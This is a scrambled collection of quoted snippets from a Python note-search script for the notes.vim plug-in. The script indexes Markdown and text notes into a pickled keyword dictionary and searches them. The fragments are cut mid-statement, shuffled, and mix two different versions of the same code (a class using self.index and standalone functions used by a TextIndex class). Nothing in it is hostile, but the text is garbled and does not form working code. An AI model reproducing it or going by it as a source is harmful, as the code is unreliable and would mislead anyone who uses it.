pattern in INCLUDE_PATTERNS): abspath = os.path.join(root, filename) notes_on_disk[abspath] =", "index['files'][filename] for kw in index['keywords']: index['keywords'][kw] = [x for x in index['keywords'][kw] if", "for word in needles: submatches = set() for original_db_kw, normalized_db_kw in normalized_db_keywords: if", "x in index['keywords'][kw] if x != filename] def tokenize(self, text: str) -> Set[str]:", "keyword index to disk.\"\"\" save_timer = Timer() with open(self.database_file, 'wb') as handle: pickle.dump(self.index,", "'notes=', 'encoding=', 'verbose', 'help', ]) except getopt.GetoptError as error: print(str(error)) self.usage() sys.exit(2) #", "self.search_index(keywords) if matches: print('\\n'.join(sorted(matches))) logger.debug(\"Finished searching index in %s\", global_timer) def parse_args(self, argv):", "the dictionary may seem very naive but it's quite # fast. Also the", "decorated.append((Levenshtein.distance(normalized_kw, substring), -len(filenames), kw)) else: decorated.append((-len(filenames), kw)) decorated.sort() selection = [d[-1] for d", "not word.isspace() and len(word) >= 2: words.add(word) return words def normalize(self, keyword): \"\"\"Normalize", "in %s ..\", len(notes_on_disk) - last_count, directory) last_count = len(notes_on_disk) logger.info(\"Found a total", "arg elif opt in ('-v', '--verbose'): logger.setLevel(logging.DEBUG) elif opt in ('-h', '--help'): self.usage()", "= self.normalize(kw) if substring in normalized_kw: if Levenshtein is not None: decorated.append((Levenshtein.distance(normalized_kw, substring),", "normalized_db_keywords = [(k, self.normalize(k)) for k in self.index['keywords']] for usr_kw in keywords: submatches", "= self.decode(self.keyword_filter) # Canonicalize pathnames, check validity. self.database_file = self.munge_path(self.database_file) self.user_directories = [self.munge_path(d)", "options to variables. for opt, arg in opts: if opt in ('-i', '--ignore-case'):", "for updated and/or deleted notes since the last run? if index: for filename", "self.character_encoding) if self.keyword_filter is not None: self.keyword_filter = self.decode(self.keyword_filter) # Canonicalize pathnames, check", "are stored only # once, so it's not as bad as it may", "and/or deleted notes since the last run? if index: for filename in set(index['files'].keys()):", "# # This Python script can be used by the notes.vim plug-in to", "Set try: import Levenshtein except ImportError: Levenshtein = None # The version of", "if index: for filename in set(index['files'].keys()): if filename not in notes_on_disk: # Forget", "self.index_location = index_location self.notes_directories = notes_directories self.index = load_index(self.index_location) def search(self, query: str)", "8 MB) and 25000 keywords and it's plenty fast. if usr_kw in normalized_db_kw:", "assert False, \"Unhandled option\" logger.debug(\"Index file: %s\", self.database_file) logger.debug(\"Notes directories: %r\", self.user_directories) logger.debug(\"Character", "can be used by the notes.vim plug-in to perform fast # keyword searches", "def load_index(index_location): try: load_timer = Timer() logger.debug(\"Loading index from %s ..\", index_location) with", "= self.parse_args(argv or sys.argv[1:]) self.load_index() self.update_index() if self.dirty: self.save_index() if self.keyword_filter is not", "open(index_location, 'rb') as handle: index = pickle.load(handle) logger.debug(\"Format version of index loaded from", "else: # Check whether previously seen note has changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db", "command to search all of the user's notes: # # - Very large", "needed -- I have over # 850 notes (about 8 MB) and 25000", "%i\", self.index['version']) assert self.index['version'] == INDEX_VERSION, \"Incompatible index format detected!\" self.first_use = False", "('-l', '--list'): self.keyword_filter = arg.strip().lower() elif opt in ('-d', '--database'): self.database_file = arg", "NOTES_DIRECTORIES = [os.path.expanduser('~/Dropbox/notes')] INDEX_FILE_PATH = os.path.expanduser('~/notes-index.pickle') logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger(__name__) def load_index(index_location): try:", "the keyword index to disk.\"\"\" with open(database_file, 'wb') as handle: pickle.dump(index, handle) class", "is not already indexed).\"\"\" logger.info(\"Adding file to index: %s\", filename) self.index['files'][filename] = last_modified", "preferred character encoding.\"\"\" if isinstance(text, str): text = codecs.encode(text, self.character_encoding, 'ignore') return text", "import os import re import sys import time import pickle from typing import", "empty one.\"\"\" try: load_timer = Timer() logger.debug(\"Loading index from %s ..\", self.database_file) with", "in self.index['keywords']: self.index['keywords'][kw] = [filename] else: self.index['keywords'][kw].append(filename) self.dirty = True def delete_note(self, filename):", "else: decorated.append((-len(filenames), kw)) decorated.sort() selection = [d[-1] for d in decorated[:limit]] print(selection) print(self.encode(u'\\n'.join(selection)))", "First we find the filenames and last modified times of the notes on", "last_modified with open(filename, encoding='utf-8') as handle: for kw in self.tokenize(handle.read()): if kw not", "for kw, filenames in self.index['keywords'].items(): normalized_kw = self.normalize(kw) if substring in normalized_kw: if", "# unsupported version, the script knows that it should rebuild the index. INDEX_VERSION", "submatches = set() for original_db_kw, normalized_db_kw in normalized_db_keywords: if word in normalized_db_kw: submatches.update(index['keywords'][original_db_kw])", "class Timer: \"\"\"Easy to use timer to keep track of long during operations.\"\"\"", "with open(index_location, 'rb') as handle: index = pickle.load(handle) logger.debug(\"Format version of index loaded", "\"\"\"Add a note to the index (assumes the note is not already indexed).\"\"\"", "\"\"\" Usage: search_notes.py [OPTIONS] KEYWORD... Search one or more directories of plain text", "or sys.argv[1:]) self.load_index() self.update_index() if self.dirty: self.save_index() if self.keyword_filter is not None: self.list_keywords(self.keyword_filter)", "fnmatch import getopt import logging import os import re import sys import time", "return {w.strip() for w in re.findall(r'\\w{3,}', text, re.UNICODE) if not w.isspace()} def save_index(self,", "'files': {}, 'version': INDEX_VERSION} else: return index class TextIndex: def __init__(self, index_location: str,", "'rb') as handle: index = pickle.load(handle) logger.debug(\"Format version of index loaded from disk:", "filename): \"\"\"Delete a note from given index.\"\"\" logger.info(\"Deleting file from index: %s\", filename)", "not in notes_on_disk: # Forget a deleted note. self.delete_note(filename) else: # Check whether", "to index: %s\", filename) self.index['files'][filename] = last_modified with open(filename, encoding='utf-8') as handle: for", "INDEX_VERSION} def save_index(self): \"\"\"Save the keyword index to disk.\"\"\" save_timer = Timer() with", "self.list_keywords(self.keyword_filter) logger.debug(\"Finished listing keywords in %s\", global_timer) else: matches = self.search_index(keywords) if matches:", "for kw in tokenize(raw): if kw not in index['keywords']: index['keywords'][kw] = [filename] else:", "self.case_sensitive = False logger.debug(\"Disabling case sensitivity\") elif opt in ('-l', '--list'): self.keyword_filter =", "if configured to do so.\"\"\" return keyword if self.case_sensitive else keyword.lower() def encode(self,", "= [x for x in self.index['keywords'][kw] if x != filename] self.dirty = True", "'*.txt'} NOTES_DIRECTORIES = [os.path.expanduser('~/Dropbox/notes')] INDEX_FILE_PATH = os.path.expanduser('~/notes-index.pickle') logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger(__name__) def load_index(index_location):", "keywords: submatches = set() for original_db_kw, normalized_db_kw in normalized_db_keywords: # Yes I'm using", "def __init__(self, argv=None): \"\"\"Entry point to the notes search.\"\"\" global_timer = Timer() keywords", "the note is not already indexed).\"\"\" logger.info(\"Adding file to index: %s\", filename) index['files'][filename]", "del index['files'][filename] for kw in index['keywords']: index['keywords'][kw] = [x for x in index['keywords'][kw]", "in index['keywords'][kw] if x != filename] def tokenize(self, text: str) -> Set[str]: \"\"\"Tokenize", "files: if any(fnmatch.fnmatch(filename, pattern) for pattern in INCLUDE_PATTERNS): abspath = os.path.join(root, filename) notes_on_disk[abspath]", "notes can be searched in less than a second. # # The keyword", "def list_keywords(self, substring, limit=25): \"\"\"Print all (matching) keywords to standard output.\"\"\" print('listing keywords')", "save_index(self, database_file: str, index): \"\"\"Save the keyword index to disk.\"\"\" with open(database_file, 'wb')", "substring -d, --database=FILE set path to keywords index file -n, --notes=DIR set directory", "using keyword index on disk. # # Author: <NAME> <<EMAIL>> # Last Change:", "sys.exit(2) # Define the command line option defaults. self.database_file = '~/.vim/misc/notes/index.pickle' self.user_directories =", "character encoding.\"\"\" if isinstance(text, bytes): text = codecs.decode(text, self.character_encoding, 'ignore') return text def", "notes_on_disk: # Forget a deleted note. self.delete_note(filename) else: # Check whether previously seen", "it. del notes_on_disk[filename] # Add new notes to index. for filename, last_modified in", "for usr_kw in keywords: submatches = set() for original_db_kw, normalized_db_kw in normalized_db_keywords: #", "os.walk(directory): for filename in files: if any(fnmatch.fnmatch(filename, pattern) for pattern in INCLUDE_PATTERNS): abspath", "'help', ]) except getopt.GetoptError as error: print(str(error)) self.usage() sys.exit(2) # Define the command", "the keyword index to disk.\"\"\" save_timer = Timer() with open(self.database_file, 'wb') as handle:", "note from given index.\"\"\" logger.info(\"Deleting file from index: %s\", filename) del index['files'][filename] for", "'list=', 'database=', 'notes=', 'encoding=', 'verbose', 'help', ]) except getopt.GetoptError as error: print(str(error)) self.usage()", "..\", index_location) with open(index_location, 'rb') as handle: index = pickle.load(handle) logger.debug(\"Format version of", "word = word.strip() if word != '' and not word.isspace() and len(word) >=", "set() for original_db_kw, normalized_db_kw in normalized_db_keywords: # Yes I'm using a nested for", "= last_modified with open(filename, encoding='utf-8') as handle: raw = handle.read() for kw in", "and 25000 keywords and it's plenty fast. if usr_kw in normalized_db_kw: submatches.update(self.index['keywords'][original_db_kw]) if", "re import sys import time import pickle from typing import List, Set try:", "scans. INCLUDE_PATTERNS = {'*.md', '*.txt'} NOTES_DIRECTORIES = [os.path.expanduser('~/Dropbox/notes')] INDEX_FILE_PATH = os.path.expanduser('~/notes-index.pickle') logging.basicConfig(level=logging.DEBUG) logger", "'--verbose'): logger.setLevel(logging.DEBUG) elif opt in ('-h', '--help'): self.usage() sys.exit(0) else: assert False, \"Unhandled", "-n, --notes=DIR set directory with user notes (can be repeated) -e, --encoding=NAME set", "not in notes_on_disk: # Forget a deleted note. self.delete_note_from_index(index, filename) else: # Check", "last_modified with open(filename, encoding='utf-8') as handle: raw = handle.read() for kw in tokenize(raw):", "up with something more # efficient, but really it doesn't seem to be", "if last_modified_on_disk > last_modified_in_db: self.delete_note_from_index(index, filename) self.add_note_to_index(index, filename, last_modified_on_disk) # Already checked this", "the user's preferred character encoding.\"\"\" if isinstance(text, str): text = codecs.encode(text, self.character_encoding, 'ignore')", "a deleted note. self.delete_note(filename) else: # Check whether previously seen note has changed?", "is not None: self.keyword_filter = self.decode(self.keyword_filter) # Canonicalize pathnames, check validity. self.database_file =", "string into a list of normalized, unique keywords.\"\"\" return {w.strip() for w in", "http://peterodding.com/code/vim/notes/. \"\"\" Usage: search_notes.py [OPTIONS] KEYWORD... Search one or more directories of plain", "logging.getLogger(__name__) def load_index(index_location): try: load_timer = Timer() logger.debug(\"Loading index from %s ..\", index_location)", "in normalized_db_kw: submatches.update(self.index['keywords'][original_db_kw]) if matches is None: matches = submatches else: matches &=", "d in self.user_directories if os.path.isdir(d)] # Return tokenized keyword arguments. return [self.normalize(k) for", "open(self.database_file, 'rb') as handle: self.index = pickle.load(handle) logger.debug(\"Format version of index loaded from", "self.database_file = self.munge_path(self.database_file) self.user_directories = [self.munge_path(d) for d in self.user_directories if os.path.isdir(d)] #", "text): \"\"\"Decode a string in the user's preferred character encoding.\"\"\" if isinstance(text, bytes):", "in self.user_directories: print('Scanning', directory) for root, dirs, files in os.walk(directory): for filename in", "import sys import time import pickle from typing import List, Set try: import", "seem very naive but it's quite # fast. Also the pickle protocol makes", "so.\"\"\" return keyword if self.case_sensitive else keyword.lower() def encode(self, text): \"\"\"Encode a string", "keywords matching substring -d, --database=FILE set path to keywords index file -n, --notes=DIR", "re.UNICODE) if not w.isspace()} def save_index(self, database_file: str, index): \"\"\"Save the keyword index", "text = codecs.encode(text, self.character_encoding, 'ignore') return text def decode(self, text): \"\"\"Decode a string", "keywords.\"\"\" matches = None normalized_db_keywords = [(k, self.normalize(k)) for k in self.index['keywords']] for", "show this message and exit For more information see http://peterodding.com/code/vim/notes/ \"\"\" # Standard", "two advantages over just # using Vim's internal :vimgrep command to search all", "keyword index by scanning the notes directory.\"\"\" user_directories = self.notes_directories index = self.index", "# Yes I'm using a nested for loop over all keywords in the", "def __init__(self): self.start_time = time.time() def __str__(self): return \"%.2f seconds\" % self.elapsed_time @property", "directories of plain text files using a full text index, updated automatically during", "fast. Also the pickle protocol makes sure repeating strings are stored only #", "None # Map command line options to variables. for opt, arg in opts:", "# Check for updated and/or deleted notes since the last run? if index:", "the case of a keyword if configured to do so.\"\"\" return keyword if", "all of the given keywords.\"\"\" print('Searching index') index = load_index(INDEX_FILE_PATH) needles = query.split()", "repeated) -e, --encoding=NAME set character encoding of notes -v, --verbose make more noise", "MB) and 25000 keywords and it's plenty fast. if usr_kw in normalized_db_kw: submatches.update(self.index['keywords'][original_db_kw])", "self.save_index(INDEX_FILE_PATH, index) def add_note_to_index(self, index, filename, last_modified): \"\"\"Add a note to the index", "for d in self.user_directories if os.path.isdir(d)] # Return tokenized keyword arguments. return [self.normalize(k)", "keyword index by scanning the notes directory.\"\"\" update_timer = Timer() # First we", "else: assert False, \"Unhandled option\" logger.debug(\"Index file: %s\", self.database_file) logger.debug(\"Notes directories: %r\", self.user_directories)", "- last_count, directory) last_count = len(notes_on_disk) logger.info(\"Found a total of %i notes ..\",", "matching substring -d, --database=FILE set path to keywords index file -n, --notes=DIR set", "keyword if configured to do so.\"\"\" return keyword if self.case_sensitive else keyword.lower() def", "word in re.findall(r'\\w+', text, re.UNICODE): word = word.strip() if word != '' and", "2: words.add(word) return words def normalize(self, keyword): \"\"\"Normalize the case of a keyword", "patterns of files to ignore during scans. INCLUDE_PATTERNS = {'*.md', '*.txt'} NOTES_DIRECTORIES =", "deleted note. self.delete_note_from_index(index, filename) else: # Check whether previously seen note has changed?", "'il:d:n:e:vh', [ 'ignore-case', 'list=', 'database=', 'notes=', 'encoding=', 'verbose', 'help', ]) except getopt.GetoptError as", "delete_note_from_index(self, index, filename): \"\"\"Delete a note from given index.\"\"\" logger.info(\"Deleting file from index:", "self.load_index() self.update_index() if self.dirty: self.save_index() if self.keyword_filter is not None: self.list_keywords(self.keyword_filter) logger.debug(\"Finished listing", "index. for filename, last_modified in notes_on_disk.items(): self.add_note(filename, last_modified) logger.info(\"Updated index in %s\", update_timer)", "# Map command line options to variables. for opt, arg in opts: if", "filename, last_modified_on_disk) # Already checked this note, we can forget about it. del", "format detected!\" self.first_use = False self.dirty = False logger.debug(\"Loaded %i notes from index", "time import pickle from typing import List, Set try: import Levenshtein except ImportError:", "[filename] else: self.index['keywords'][kw].append(filename) self.dirty = True def delete_note(self, filename): \"\"\"Remove a note from", "submatches = set() for original_db_kw, normalized_db_kw in normalized_db_keywords: # Yes I'm using a", "may seem very naive but it's quite # fast. Also the pickle protocol", "words = set() text = self.decode(text) for word in re.findall(r'\\w+', text, re.UNICODE): word", "for filename, last_modified in notes_on_disk.items(): self.add_note(filename, last_modified) logger.info(\"Updated index in %s\", update_timer) def", "logger.info(\"Updated index in %s\", update_timer) def add_note(self, filename, last_modified): \"\"\"Add a note to", "if necessary. self.save_index(INDEX_FILE_PATH, index) def add_note_to_index(self, index, filename, last_modified): \"\"\"Add a note to", "knows that it should rebuild the index. INDEX_VERSION = 3 # Filename matching", "# The version of the index format that's supported by this revision of", "a keyword if configured to do so.\"\"\" return keyword if self.case_sensitive else keyword.lower()", "\"\"\"Update the keyword index by scanning the notes directory.\"\"\" update_timer = Timer() #", "if opt in ('-i', '--ignore-case'): self.case_sensitive = False logger.debug(\"Disabling case sensitivity\") elif opt", "version, the script knows that it should rebuild the index. INDEX_VERSION = 3", "%s\", len(self.index['files']), load_timer) except Exception: logger.warn(\"Failed to load index from file!\", exc_info=True) self.first_use", "= query.split() matches = None normalized_db_keywords = [(k, k.lower()) for k in index['keywords']]", "from %s ..\", index_location) with open(index_location, 'rb') as handle: index = pickle.load(handle) logger.debug(\"Format", "[OPTIONS] KEYWORD... Search one or more directories of plain text files using a", "in opts: if opt in ('-i', '--ignore-case'): self.case_sensitive = False logger.debug(\"Disabling case sensitivity\")", "--help show this message and exit For more information see http://peterodding.com/code/vim/notes/ \"\"\" #", "k.lower()) for k in index['keywords']] for word in needles: submatches = set() for", "do so.\"\"\" return keyword if self.case_sensitive else keyword.lower() def encode(self, text): \"\"\"Encode a", "self.keyword_filter = None # Map command line options to variables. for opt, arg", "if not self.first_use: for filename in self.index['files'].keys(): if filename not in notes_on_disk: #", "and exit For more information see http://peterodding.com/code/vim/notes/ \"\"\" # Standard library modules. import", "arguments. return [self.normalize(k) for k in self.tokenize(' '.join(keywords))] def load_index(self): \"\"\"Load the keyword", "index or start with an empty one.\"\"\" try: load_timer = Timer() logger.debug(\"Loading index", "for x in self.index['keywords'][kw] if x != filename] self.dirty = True def search_index(self,", "Author: <NAME> <<EMAIL>> # Last Change: November 1, 2015 # URL: http://peterodding.com/code/vim/notes/ #", "ignore during scans. INCLUDE_PATTERNS = {'*.md', '*.txt'} NOTES_DIRECTORIES = [os.path.expanduser('~/Dropbox/notes')] INDEX_FILE_PATH = os.path.expanduser('~/notes-index.pickle')", "the pickle # module. The structure of the dictionary may seem very naive", "x in self.index['keywords'][kw] if x != filename] self.dirty = True def search_index(self, keywords):", "handle: raw = handle.read() for kw in tokenize(raw): if kw not in index['keywords']:", "plug-in to perform fast # keyword searches in the user's notes. It has", "self.decode(self.keyword_filter) # Canonicalize pathnames, check validity. self.database_file = self.munge_path(self.database_file) self.user_directories = [self.munge_path(d) for", "index. If # I really have to I'll probably come up with something", "a Python dictionary that's persisted using the pickle # module. The structure of", "matches &= submatches return sorted(matches) if matches else [] def update_index(self): \"\"\"Update the", "self.parse_args(argv or sys.argv[1:]) self.load_index() self.update_index() if self.dirty: self.save_index() if self.keyword_filter is not None:", "scanning the notes directory.\"\"\" update_timer = Timer() # First we find the filenames", "during operations.\"\"\" def __init__(self): self.start_time = time.time() def __str__(self): return \"%.2f seconds\" %", "'--ignore-case'): self.case_sensitive = False logger.debug(\"Disabling case sensitivity\") elif opt in ('-l', '--list'): self.keyword_filter", "notes -v, --verbose make more noise -h, --help show this message and exit", "disk: %i\", index['version']) assert index['version'] == INDEX_VERSION, \"Incompatible index format detected!\" logger.debug(\"Loaded %i", "logger.setLevel(logging.DEBUG) elif opt in ('-h', '--help'): self.usage() sys.exit(0) else: assert False, \"Unhandled option\"", "arg in opts: if opt in ('-i', '--ignore-case'): self.case_sensitive = False logger.debug(\"Disabling case", "this note, we can forget about it. del notes_on_disk[filename] # Add new notes", "include: -i, --ignore-case ignore case of keyword(s) -l, --list=SUBSTR list keywords matching substring", "elif opt in ('-h', '--help'): self.usage() sys.exit(0) else: assert False, \"Unhandled option\" logger.debug(\"Index", "import List, Set try: import Levenshtein except ImportError: Levenshtein = None # The", "the given keywords.\"\"\" matches = None normalized_db_keywords = [(k, self.normalize(k)) for k in", "# I really have to I'll probably come up with something more #", "I have over # 850 notes (about 8 MB) and 25000 keywords and", "index_location: str, notes_directories: List[str]): self.index_location = index_location self.notes_directories = notes_directories self.index = load_index(self.index_location)", "notes_on_disk[filename] # Add new notes to index. for filename, last_modified in notes_on_disk.items(): self.add_note(filename,", "try: load_timer = Timer() logger.debug(\"Loading index from %s ..\", index_location) with open(index_location, 'rb')", "Exception: logger.warn(\"Failed to load index from file!\", exc_info=True) self.first_use = True self.dirty =", "kw)) else: decorated.append((-len(filenames), kw)) decorated.sort() selection = [d[-1] for d in decorated[:limit]] print(selection)", "[x for x in index['keywords'][kw] if x != filename] def tokenize(self, text: str)", "notes on disk. notes_on_disk = {} last_count = 0 for directory in self.user_directories:", "list(matches) if matches else [] def list_keywords(self, substring, limit=25): \"\"\"Print all (matching) keywords", "word != '' and not word.isspace() and len(word) >= 2: words.add(word) return words", "__init__(self, index_location: str, notes_directories: List[str]): self.index_location = index_location self.notes_directories = notes_directories self.index =", "something more # efficient, but really it doesn't seem to be needed --", "self.user_directories = ['~/.vim/misc/notes/user/'] self.character_encoding = 'UTF-8' self.case_sensitive = True self.keyword_filter = None #", "kw not in self.index['keywords']: self.index['keywords'][kw] = [filename] else: self.index['keywords'][kw].append(filename) self.dirty = True def", "(can be repeated) -e, --encoding=NAME set character encoding of notes -v, --verbose make", "return list(matches) if matches else [] def list_keywords(self, substring, limit=25): \"\"\"Print all (matching)", "opt in ('-i', '--ignore-case'): self.case_sensitive = False logger.debug(\"Disabling case sensitivity\") elif opt in", "one or more directories of plain text files using a full text index,", "logger.debug(\"Character encoding: %s\", self.character_encoding) if self.keyword_filter is not None: self.keyword_filter = self.decode(self.keyword_filter) #", "in re.findall(r'\\w{3,}', text, re.UNICODE) if not w.isspace()} def save_index(self, database_file: str, index): \"\"\"Save", "= pickle.load(handle) logger.debug(\"Format version of index loaded from disk: %i\", index['version']) assert index['version']", "It has two advantages over just # using Vim's internal :vimgrep command to", "List[str]: \"\"\"Return names of files containing all of the given keywords.\"\"\" print('Searching index')", "advantages over just # using Vim's internal :vimgrep command to search all of", "if usr_kw in normalized_db_kw: submatches.update(self.index['keywords'][original_db_kw]) if matches is None: matches = submatches else:", "= codecs.encode(text, self.character_encoding, 'ignore') return text def decode(self, text): \"\"\"Decode a string in", "index in %s\", global_timer) def parse_args(self, argv): \"\"\"Parse the command line arguments.\"\"\" try:", "= arg elif opt in ('-n', '--notes'): self.user_directories.append(arg) elif opt in ('-e', '--encoding'):", "notes from index in %s\", len(index['files']), load_timer) except Exception: logger.warning(\"Failed to load index", "self.update_index() if self.dirty: self.save_index() if self.keyword_filter is not None: self.list_keywords(self.keyword_filter) logger.debug(\"Finished listing keywords", "come up with something more # efficient, but really it doesn't seem to", "# 850 notes (about 8 MB) and 25000 keywords and it's plenty fast.", "sys.exit(0) else: assert False, \"Unhandled option\" logger.debug(\"Index file: %s\", self.database_file) logger.debug(\"Notes directories: %r\",", "print(__doc__.strip()) class Timer: \"\"\"Easy to use timer to keep track of long during", "is a Python dictionary that's persisted using the pickle # module. The structure", "filename) del index['files'][filename] for kw in index['keywords']: index['keywords'][kw] = [x for x in", "words def normalize(self, keyword): \"\"\"Normalize the case of a keyword if configured to", "from the index.\"\"\" logger.info(\"Removing file from index: %s\", filename) del self.index['files'][filename] for kw", "notes search.\"\"\" global_timer = Timer() keywords = self.parse_args(argv or sys.argv[1:]) self.load_index() self.update_index() if", "submatches return list(matches) if matches else [] def list_keywords(self, substring, limit=25): \"\"\"Print all", "return {'keywords': {}, 'files': {}, 'version': INDEX_VERSION} else: return index class TextIndex: def", "self.add_note(filename, last_modified_on_disk) # Already checked this note, we can forget about it. del", "self.usage() sys.exit(0) else: assert False, \"Unhandled option\" logger.debug(\"Index file: %s\", self.database_file) logger.debug(\"Notes directories:", "def search_index(self, keywords): \"\"\"Return names of files containing all of the given keywords.\"\"\"", "Vim's internal :vimgrep command to search all of the user's notes: # #", "plain text files using a full text index, updated automatically during each invocation", "def encode(self, text): \"\"\"Encode a string in the user's preferred character encoding.\"\"\" if", "notes_on_disk = {} last_count = 0 for directory in self.user_directories: print('Scanning', directory) for", "character encoding.\"\"\" if isinstance(text, str): text = codecs.encode(text, self.character_encoding, 'ignore') return text def", "self.decode(text) for word in re.findall(r'\\w+', text, re.UNICODE): word = word.strip() if word !=", "add_note_to_index(self, index, filename, last_modified): \"\"\"Add a note to the index (assumes the note", "as handle: index = pickle.load(handle) logger.debug(\"Format version of index loaded from disk: %i\",", "self.index # First we find the filenames and last modified times of the", "re.findall(r'\\w+', text, re.UNICODE): word = word.strip() if word != '' and not word.isspace()", "seem to be needed -- I have over # 850 notes (about 8", "script for fast text file searching using keyword index on disk. # #", "getopt.getopt(argv, 'il:d:n:e:vh', [ 'ignore-case', 'list=', 'database=', 'notes=', 'encoding=', 'verbose', 'help', ]) except getopt.GetoptError", "self.notes_directories = notes_directories self.index = load_index(self.index_location) def search(self, query: str) -> List[str]: \"\"\"Return", "set character encoding of notes -v, --verbose make more noise -h, --help show", "re.findall(r'\\w{3,}', text, re.UNICODE) if not w.isspace()} def save_index(self, database_file: str, index): \"\"\"Save the", "keyword.lower() def encode(self, text): \"\"\"Encode a string in the user's preferred character encoding.\"\"\"", "previously seen note has changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = index['files'][filename] if last_modified_on_disk", "kw in index['keywords']: index['keywords'][kw] = [x for x in index['keywords'][kw] if x !=", "[os.path.expanduser('~/Dropbox/notes')] INDEX_FILE_PATH = os.path.expanduser('~/notes-index.pickle') logging.basicConfig(level=logging.DEBUG) logger = logging.getLogger(__name__) def load_index(index_location): try: load_timer =", "('-d', '--database'): self.database_file = arg elif opt in ('-n', '--notes'): self.user_directories.append(arg) elif opt", "last run? if index: for filename in set(index['files'].keys()): if filename not in notes_on_disk:", "keywords in the index. If # I really have to I'll probably come", "disk.\"\"\" save_timer = Timer() with open(self.database_file, 'wb') as handle: pickle.dump(self.index, handle) logger.debug(\"Saved index", "None normalized_db_keywords = [(k, k.lower()) for k in index['keywords']] for word in needles:", "used by the notes.vim plug-in to perform fast # keyword searches in the", "in self.index['keywords']] for usr_kw in keywords: submatches = set() for original_db_kw, normalized_db_kw in", "self.index['files'][filename] for kw in self.index['keywords']: self.index['keywords'][kw] = [x for x in self.index['keywords'][kw] if", "len(self.index['files']), load_timer) except Exception: logger.warn(\"Failed to load index from file!\", exc_info=True) self.first_use =", "# The keyword index is a Python dictionary that's persisted using the pickle", "('-i', '--ignore-case'): self.case_sensitive = False logger.debug(\"Disabling case sensitivity\") elif opt in ('-l', '--list'):", "whether previously seen note has changed? last_modified_on_disk = notes_on_disk[filename] last_modified_in_db = self.index['files'][filename] if", "The keyword index is a Python dictionary that's persisted using the pickle #", "use timer to keep track of long during operations.\"\"\" def __init__(self): self.start_time =", "notes_directories: List[str]): self.index_location = index_location self.notes_directories = notes_directories self.index = load_index(self.index_location) def search(self,", "str) -> Set[str]: \"\"\"Tokenize a string into a list of normalized, unique keywords.\"\"\"", "file is found with an # unsupported version, the script knows that it", "pattern) for pattern in INCLUDE_PATTERNS): abspath = os.path.join(root, filename) notes_on_disk[abspath] = os.path.getmtime(abspath) logger.info(\"Found", "deleted notes since the last run? if not self.first_use: for filename in self.index['files'].keys():", "option\" logger.debug(\"Index file: %s\", self.database_file) logger.debug(\"Notes directories: %r\", self.user_directories) logger.debug(\"Character encoding: %s\", self.character_encoding)", "from file!\", exc_info=True) return {'keywords': {}, 'files': {}, 'version': INDEX_VERSION} else: return index", "in ('-d', '--database'): self.database_file = arg elif opt in ('-n', '--notes'): self.user_directories.append(arg) elif", "probably come up with something more # efficient, but really it doesn't seem", "files using a full text index, updated automatically during each invocation of the", "in set(index['files'].keys()): if filename not in notes_on_disk: # Forget a deleted note. self.delete_note_from_index(index,", "stored only # once, so it's not as bad as it may appear", "'encoding=', 'verbose', 'help', ]) except getopt.GetoptError as error: print(str(error)) self.usage() sys.exit(2) # Define", "self.user_directories: print('Scanning', directory) for root, dirs, files in os.walk(directory): for filename in files:", "notes since the last run? if index: for filename in set(index['files'].keys()): if filename", "import codecs import fnmatch import getopt import logging import os import re import", "and not word.isspace() and len(word) >= 2: words.add(word) return words def normalize(self, keyword):", "matches else [] def list_keywords(self, substring, limit=25): \"\"\"Print all (matching) keywords to standard", "os.path.abspath(os.path.expanduser(path)) def usage(self): print(__doc__.strip()) class Timer: \"\"\"Easy to use timer to keep track", "string into a list of normalized, unique keywords.\"\"\" words = set() text =", "codecs.decode(text, self.character_encoding, 'ignore') return text def munge_path(self, path): \"\"\"Canonicalize user-defined path, making it", "the notes directory.\"\"\" update_timer = Timer() # First we find the filenames and", "set() for original_db_kw, normalized_db_kw in normalized_db_keywords: if word in normalized_db_kw: submatches.update(index['keywords'][original_db_kw]) if matches", "logger.warn(\"Failed to load index from file!\", exc_info=True) self.first_use = True self.dirty = True", "all of the user's notes: # # - Very large notes don't slow", "self.user_directories) logger.debug(\"Character encoding: %s\", self.character_encoding) if self.keyword_filter is not None: self.keyword_filter = self.decode(self.keyword_filter)", "fast. if usr_kw in normalized_db_kw: submatches.update(self.index['keywords'][original_db_kw]) if matches is None: matches = submatches", "- Very large notes don't slow searching down so much; # - Hundreds", "kw in self.tokenize(handle.read()): if kw not in self.index['keywords']: self.index['keywords'][kw] = [filename] else: self.index['keywords'][kw].append(filename)", "Filename matching patterns of files to ignore during scans. INCLUDE_PATTERNS = {'*.md', '*.txt'}", "\"\"\"Print all (matching) keywords to standard output.\"\"\" print('listing keywords') decorated = [] substring", "for filename in set(index['files'].keys()): if filename not in notes_on_disk: # Forget a deleted", "all keywords in the index. If # I really have to I'll probably", "KEYWORD... Search one or more directories of plain text files using a full", "# Forget a deleted note. self.delete_note_from_index(index, filename) else: # Check whether previously seen", "notes (about 8 MB) and 25000 keywords and it's plenty fast. if usr_kw", "import fnmatch import getopt import logging import os import re import sys import", "&= submatches return list(matches) if matches else [] def list_keywords(self, substring, limit=25): \"\"\"Print", "in index['keywords']] for word in needles: submatches = set() for original_db_kw, normalized_db_kw in", "if matches else [] def update_index(self): \"\"\"Update the keyword index by scanning the", "not as bad as it may appear at first sight :-). # #", "revision of the # `search_notes.py' script; if an existing index file is found", "notes_on_disk.items(): self.add_note(filename, last_modified) logger.info(\"Updated index in %s\", update_timer) def add_note(self, filename, last_modified): \"\"\"Add", "= self.decode(text) for word in re.findall(r'\\w+', text, re.UNICODE): word = word.strip() if word", "text, re.UNICODE): word = word.strip() if word != '' and not word.isspace() and", "3 # Filename matching patterns of files to ignore during scans. INCLUDE_PATTERNS =", "notes directory.\"\"\" update_timer = Timer() # First we find the filenames and last", "= Timer() # First we find the filenames and last modified times of", "'--encoding'): self.character_encoding = arg elif opt in ('-v', '--verbose'): logger.setLevel(logging.DEBUG) elif opt in", "self.character_encoding = 'UTF-8' self.case_sensitive = True self.keyword_filter = None # Map command line", "case of a keyword if configured to do so.\"\"\" return keyword if self.case_sensitive", "plenty fast. if usr_kw in normalized_db_kw: submatches.update(self.index['keywords'][original_db_kw]) if matches is None: matches =", "def update_index(self): \"\"\"Update the keyword index by scanning the notes directory.\"\"\" user_directories =", "Vim plug-in see http://peterodding.com/code/vim/notes/. \"\"\" Usage: search_notes.py [OPTIONS] KEYWORD... Search one or more", "= pickle.load(handle) logger.debug(\"Format version of index loaded from disk: %i\", self.index['version']) assert 